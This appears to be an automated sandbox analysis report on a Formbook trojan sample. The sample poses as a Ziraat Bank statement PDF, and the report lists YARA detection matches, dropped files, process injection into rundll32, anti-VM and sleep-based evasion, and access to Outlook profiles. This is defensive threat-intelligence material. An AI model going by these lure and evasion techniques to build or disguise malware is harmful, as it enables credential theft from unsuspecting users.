          Source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0135E15F1_2_0135E15F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_013790341_2_01379034
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0137D5C71_2_0137D5C7
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_013787231_2_01378723
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01372F7E1_2_01372F7E
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0135F7931_2_0135F793
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01373F8B1_2_01373F8B
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01387E141_2_01387E14
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_009508B71_2_009508B7
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_00950A491_2_00950A49
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004058032_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004038832_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00401B602_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00421B3F2_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00401C702_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004055E22_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004055E32_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004206D32_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004017C02_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0040BFCE2_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0040BFD32_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0040BF8D2_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004017B32_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0135E15F2_2_0135E15F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013790342_2_01379034
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0138D0602_2_0138D060
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0138B3D02_2_0138B3D0
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013925862_2_01392586
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0138D5E02_2_0138D5E0
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0137A5D62_2_0137A5D6
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0137D5C72_2_0137D5C7
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013754BA2_2_013754BA
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013764CE2_2_013764CE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013787232_2_01378723
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0135F7932_2_0135F793
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013776D62_2_013776D6
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01351AF02_2_01351AF0
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0138CD102_2_0138CD10
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0137DD472_2_0137DD47
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01379DDC2_2_01379DDC
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01374CB52_2_01374CB5
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01372F7E2_2_01372F7E
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: String function: 01353A50 appears 111 times
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: String function: 01363699 appears 48 times
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: String function: 013630D1 appears 80 times
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E5F3 NtCreateFile,2_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E6A3 NtReadFile,2_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E723 NtClose,2_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E7D3 NtAllocateVirtualMemory,2_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E5ED NtCreateFile,2_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E69D NtReadFile,2_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041E7CD NtAllocateVirtualMemory,2_2_0041E7CD
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\cmezd.exe "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess created: C:\Users\user\AppData\Local\Temp\cmezd.exe C:\Users\user\AppData\Local\Temp\cmezd.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\cmezd.exe "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.pJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess created: C:\Users\user\AppData\Local\Temp\cmezd.exe C:\Users\user\AppData\Local\Temp\cmezd.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsf979F.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@18/12
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCommand line argument: 2480580401342_2_01352CE0
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCommand line argument: Notepad2_2_01352CE0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: cmezd.exe, 00000001.00000003.257768697.0000000001190000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000001.00000003.261136975.000000001A540000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.000000000192F000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.0000000001810000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000003.263612965.000000000167A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.304145005.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.00000000049AF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.302045317.000000000455F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.0000000004890000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: cmezd.exe, 00000001.00000003.257768697.0000000001190000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000001.00000003.261136975.000000001A540000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.000000000192F000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.0000000001810000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000003.263612965.000000000167A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.304145005.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.00000000049AF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.302045317.000000000455F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.0000000004890000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: cmezd.exe, 00000002.00000002.302640437.000000000157A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: cmezd.exe, 00000002.00000002.302640437.000000000157A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136F18E push ecx; ret 1_2_0136F1A1
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00407033 push ds; retf 2_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041B377 pushad ; iretd 2_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0041B379 push eax; iretd 2_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00403444 push ebp; ret 2_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004055DA push ecx; ret 2_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_004105E3 push esi; iretd 2_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136F18E push ecx; ret 2_2_0136F1A1
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01353AA0 push ecx; ret 2_2_01353AB3
          Source: cmezd.exe.0.drStatic PE information: section name: .00cfg
          Source: cmezd.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\cmezd.exeJump to dropped file
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-19321
          Source: C:\Windows\explorer.exe TID: 3560Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4604Thread sleep count: 49 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4604Thread sleep time: -98000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_009507DA GetSystemInfo,1_2_009507DA
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136DB70 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_0136DB70
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136DABC FindFirstFileExW,1_2_0136DABC
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136D74D FindFirstFileExW,1_2_0136D74D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136D7FE FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_0136D7FE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01351022 FindFirstFileW,FindClose,2_2_01351022
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136D74D FindFirstFileExW,2_2_0136D74D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136D7FE FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0136D7FE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136DB70 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0136DB70
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136DABC FindFirstFileExW,2_2_0136DABC
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000003.00000000.275433993.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.782159260.0000000007245000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.779126189.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.474028376.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.275433993.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.275433993.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000002.788702164.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: rundll32.exe, 00000009.00000002.782159260.0000000007232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USnR
          Source: explorer.exe, 00000003.00000000.269277064.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
